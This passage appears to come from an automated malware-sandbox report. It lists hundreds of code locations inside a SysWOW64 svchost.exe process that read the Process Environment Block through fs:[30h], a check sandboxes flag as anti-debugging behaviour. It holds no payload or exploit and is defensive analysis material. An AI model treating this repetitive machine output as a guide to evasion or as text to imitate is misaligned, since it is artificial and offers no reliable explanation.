                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A30B mov eax, dword ptr fs:[00000030h]1_2_0336A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D437C mov eax, dword ptr fs:[00000030h]1_2_033D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03408324 mov eax, dword ptr fs:[00000030h]1_2_03408324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03408324 mov ecx, dword ptr fs:[00000030h]1_2_03408324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03408324 mov eax, dword ptr fs:[00000030h]1_2_03408324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03408324 mov eax, dword ptr fs:[00000030h]1_2_03408324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B035C mov eax, dword ptr fs:[00000030h]1_2_033B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B035C mov eax, dword ptr fs:[00000030h]1_2_033B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B035C mov eax, dword ptr fs:[00000030h]1_2_033B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B035C mov ecx, dword ptr fs:[00000030h]1_2_033B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B035C mov eax, dword ptr fs:[00000030h]1_2_033B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B035C mov eax, dword ptr fs:[00000030h]1_2_033B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FA352 mov eax, dword ptr fs:[00000030h]1_2_033FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D8350 mov ecx, dword ptr fs:[00000030h]1_2_033D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03328397 mov eax, dword ptr fs:[00000030h]1_2_03328397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03328397 mov eax, dword ptr fs:[00000030h]1_2_03328397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03328397 mov eax, dword ptr fs:[00000030h]1_2_03328397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332E388 mov eax, dword ptr fs:[00000030h]1_2_0332E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332E388 mov eax, dword ptr fs:[00000030h]1_2_0332E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332E388 mov eax, dword ptr fs:[00000030h]1_2_0332E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335438F mov eax, dword ptr fs:[00000030h]1_2_0335438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335438F mov eax, dword ptr fs:[00000030h]1_2_0335438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334E3F0 mov eax, dword ptr fs:[00000030h]1_2_0334E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334E3F0 mov eax, dword ptr fs:[00000030h]1_2_0334E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334E3F0 mov eax, dword ptr fs:[00000030h]1_2_0334E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033663FF mov eax, dword ptr fs:[00000030h]1_2_033663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h]1_2_033403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h]1_2_033403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h]1_2_033403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h]1_2_033403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h]1_2_033403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h]1_2_033403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h]1_2_033403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h]1_2_033403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE3DB mov eax, dword ptr fs:[00000030h]1_2_033DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE3DB mov eax, dword ptr fs:[00000030h]1_2_033DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE3DB mov ecx, dword ptr fs:[00000030h]1_2_033DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE3DB mov eax, dword ptr fs:[00000030h]1_2_033DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D43D4 mov eax, dword ptr fs:[00000030h]1_2_033D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D43D4 mov eax, dword ptr fs:[00000030h]1_2_033D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033EC3CD mov eax, dword ptr fs:[00000030h]1_2_033EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A3C0 mov eax, dword ptr fs:[00000030h]1_2_0333A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A3C0 mov eax, dword ptr fs:[00000030h]1_2_0333A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A3C0 mov eax, dword ptr fs:[00000030h]1_2_0333A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A3C0 mov eax, dword ptr fs:[00000030h]1_2_0333A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A3C0 mov eax, dword ptr fs:[00000030h]1_2_0333A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A3C0 mov eax, dword ptr fs:[00000030h]1_2_0333A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033383C0 mov eax, dword ptr fs:[00000030h]1_2_033383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033383C0 mov eax, dword ptr fs:[00000030h]1_2_033383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033383C0 mov eax, dword ptr fs:[00000030h]1_2_033383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033383C0 mov eax, dword ptr fs:[00000030h]1_2_033383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B63C0 mov eax, dword ptr fs:[00000030h]1_2_033B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332823B mov eax, dword ptr fs:[00000030h]1_2_0332823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0340625D mov eax, dword ptr fs:[00000030h]1_2_0340625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]1_2_033E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]1_2_033E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]1_2_033E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]1_2_033E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]1_2_033E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]1_2_033E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]1_2_033E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]1_2_033E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]1_2_033E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]1_2_033E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]1_2_033E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]1_2_033E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03334260 mov eax, dword ptr fs:[00000030h]1_2_03334260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03334260 mov eax, dword ptr fs:[00000030h]1_2_03334260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03334260 mov eax, dword ptr fs:[00000030h]1_2_03334260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332826B mov eax, dword ptr fs:[00000030h]1_2_0332826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332A250 mov eax, dword ptr fs:[00000030h]1_2_0332A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336259 mov eax, dword ptr fs:[00000030h]1_2_03336259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033EA250 mov eax, dword ptr fs:[00000030h]1_2_033EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033EA250 mov eax, dword ptr fs:[00000030h]1_2_033EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B8243 mov eax, dword ptr fs:[00000030h]1_2_033B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B8243 mov ecx, dword ptr fs:[00000030h]1_2_033B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033402A0 mov eax, dword ptr fs:[00000030h]1_2_033402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033402A0 mov eax, dword ptr fs:[00000030h]1_2_033402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034062D6 mov eax, dword ptr fs:[00000030h]1_2_034062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C62A0 mov eax, dword ptr fs:[00000030h]1_2_033C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C62A0 mov ecx, dword ptr fs:[00000030h]1_2_033C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C62A0 mov eax, dword ptr fs:[00000030h]1_2_033C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C62A0 mov eax, dword ptr fs:[00000030h]1_2_033C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C62A0 mov eax, dword ptr fs:[00000030h]1_2_033C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C62A0 mov eax, dword ptr fs:[00000030h]1_2_033C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E284 mov eax, dword ptr fs:[00000030h]1_2_0336E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E284 mov eax, dword ptr fs:[00000030h]1_2_0336E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B0283 mov eax, dword ptr fs:[00000030h]1_2_033B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B0283 mov eax, dword ptr fs:[00000030h]1_2_033B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B0283 mov eax, dword ptr fs:[00000030h]1_2_033B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033402E1 mov eax, dword ptr fs:[00000030h]1_2_033402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033402E1 mov eax, dword ptr fs:[00000030h]1_2_033402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033402E1 mov eax, dword ptr fs:[00000030h]1_2_033402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A2C3 mov eax, dword ptr fs:[00000030h]1_2_0333A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A2C3 mov eax, dword ptr fs:[00000030h]1_2_0333A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A2C3 mov eax, dword ptr fs:[00000030h]1_2_0333A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A2C3 mov eax, dword ptr fs:[00000030h]1_2_0333A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A2C3 mov eax, dword ptr fs:[00000030h]1_2_0333A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03360124 mov eax, dword ptr fs:[00000030h]1_2_03360124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404164 mov eax, dword ptr fs:[00000030h]1_2_03404164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404164 mov eax, dword ptr fs:[00000030h]1_2_03404164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DA118 mov ecx, dword ptr fs:[00000030h]1_2_033DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DA118 mov eax, dword ptr fs:[00000030h]1_2_033DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DA118 mov eax, dword ptr fs:[00000030h]1_2_033DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DA118 mov eax, dword ptr fs:[00000030h]1_2_033DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F0115 mov eax, dword ptr fs:[00000030h]1_2_033F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE10E mov eax, dword ptr fs:[00000030h]1_2_033DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE10E mov ecx, dword ptr fs:[00000030h]1_2_033DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE10E mov eax, dword ptr fs:[00000030h]1_2_033DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE10E mov eax, dword ptr fs:[00000030h]1_2_033DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE10E mov ecx, dword ptr fs:[00000030h]1_2_033DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE10E mov eax, dword ptr fs:[00000030h]1_2_033DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE10E mov eax, dword ptr fs:[00000030h]1_2_033DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE10E mov ecx, dword ptr fs:[00000030h]1_2_033DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE10E mov eax, dword ptr fs:[00000030h]1_2_033DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE10E mov ecx, dword ptr fs:[00000030h]1_2_033DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332C156 mov eax, dword ptr fs:[00000030h]1_2_0332C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C8158 mov eax, dword ptr fs:[00000030h]1_2_033C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336154 mov eax, dword ptr fs:[00000030h]1_2_03336154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336154 mov eax, dword ptr fs:[00000030h]1_2_03336154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C4144 mov eax, dword ptr fs:[00000030h]1_2_033C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C4144 mov eax, dword ptr fs:[00000030h]1_2_033C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C4144 mov ecx, dword ptr fs:[00000030h]1_2_033C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C4144 mov eax, dword ptr fs:[00000030h]1_2_033C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C4144 mov eax, dword ptr fs:[00000030h]1_2_033C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B019F mov eax, dword ptr fs:[00000030h]1_2_033B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B019F mov eax, dword ptr fs:[00000030h]1_2_033B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B019F mov eax, dword ptr fs:[00000030h]1_2_033B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B019F mov eax, dword ptr fs:[00000030h]1_2_033B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332A197 mov eax, dword ptr fs:[00000030h]1_2_0332A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332A197 mov eax, dword ptr fs:[00000030h]1_2_0332A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332A197 mov eax, dword ptr fs:[00000030h]1_2_0332A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034061E5 mov eax, dword ptr fs:[00000030h]1_2_034061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03370185 mov eax, dword ptr fs:[00000030h]1_2_03370185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033EC188 mov eax, dword ptr fs:[00000030h]1_2_033EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033EC188 mov eax, dword ptr fs:[00000030h]1_2_033EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D4180 mov eax, dword ptr fs:[00000030h]1_2_033D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D4180 mov eax, dword ptr fs:[00000030h]1_2_033D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033601F8 mov eax, dword ptr fs:[00000030h]1_2_033601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE1D0 mov eax, dword ptr fs:[00000030h]1_2_033AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE1D0 mov eax, dword ptr fs:[00000030h]1_2_033AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_033AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE1D0 mov eax, dword ptr fs:[00000030h]1_2_033AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE1D0 mov eax, dword ptr fs:[00000030h]1_2_033AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F61C3 mov eax, dword ptr fs:[00000030h]1_2_033F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F61C3 mov eax, dword ptr fs:[00000030h]1_2_033F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C6030 mov eax, dword ptr fs:[00000030h]1_2_033C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332A020 mov eax, dword ptr fs:[00000030h]1_2_0332A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332C020 mov eax, dword ptr fs:[00000030h]1_2_0332C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334E016 mov eax, dword ptr fs:[00000030h]1_2_0334E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334E016 mov eax, dword ptr fs:[00000030h]1_2_0334E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334E016 mov eax, dword ptr fs:[00000030h]1_2_0334E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334E016 mov eax, dword ptr fs:[00000030h]1_2_0334E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B4000 mov ecx, dword ptr fs:[00000030h]1_2_033B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]1_2_033D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]1_2_033D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]1_2_033D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]1_2_033D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]1_2_033D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]1_2_033D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]1_2_033D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]1_2_033D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335C073 mov eax, dword ptr fs:[00000030h]1_2_0335C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03332050 mov eax, dword ptr fs:[00000030h]1_2_03332050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6050 mov eax, dword ptr fs:[00000030h]1_2_033B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F60B8 mov eax, dword ptr fs:[00000030h]1_2_033F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F60B8 mov ecx, dword ptr fs:[00000030h]1_2_033F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033280A0 mov eax, dword ptr fs:[00000030h]1_2_033280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C80A8 mov eax, dword ptr fs:[00000030h]1_2_033C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333208A mov eax, dword ptr fs:[00000030h]1_2_0333208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332C0F0 mov eax, dword ptr fs:[00000030h]1_2_0332C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033720F0 mov ecx, dword ptr fs:[00000030h]1_2_033720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0332A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033380E9 mov eax, dword ptr fs:[00000030h]1_2_033380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B60E0 mov eax, dword ptr fs:[00000030h]1_2_033B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B20DE mov eax, dword ptr fs:[00000030h]1_2_033B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336273C mov eax, dword ptr fs:[00000030h]1_2_0336273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336273C mov ecx, dword ptr fs:[00000030h]1_2_0336273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336273C mov eax, dword ptr fs:[00000030h]1_2_0336273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AC730 mov eax, dword ptr fs:[00000030h]1_2_033AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336C720 mov eax, dword ptr fs:[00000030h]1_2_0336C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336C720 mov eax, dword ptr fs:[00000030h]1_2_0336C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03330710 mov eax, dword ptr fs:[00000030h]1_2_03330710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03360710 mov eax, dword ptr fs:[00000030h]1_2_03360710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336C700 mov eax, dword ptr fs:[00000030h]1_2_0336C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338770 mov eax, dword ptr fs:[00000030h]1_2_03338770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03330750 mov eax, dword ptr fs:[00000030h]1_2_03330750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BE75D mov eax, dword ptr fs:[00000030h]1_2_033BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372750 mov eax, dword ptr fs:[00000030h]1_2_03372750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372750 mov eax, dword ptr fs:[00000030h]1_2_03372750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B4755 mov eax, dword ptr fs:[00000030h]1_2_033B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336674D mov esi, dword ptr fs:[00000030h]1_2_0336674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336674D mov eax, dword ptr fs:[00000030h]1_2_0336674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336674D mov eax, dword ptr fs:[00000030h]1_2_0336674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033307AF mov eax, dword ptr fs:[00000030h]1_2_033307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E47A0 mov eax, dword ptr fs:[00000030h]1_2_033E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D678E mov eax, dword ptr fs:[00000030h]1_2_033D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033347FB mov eax, dword ptr fs:[00000030h]1_2_033347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033347FB mov eax, dword ptr fs:[00000030h]1_2_033347FB
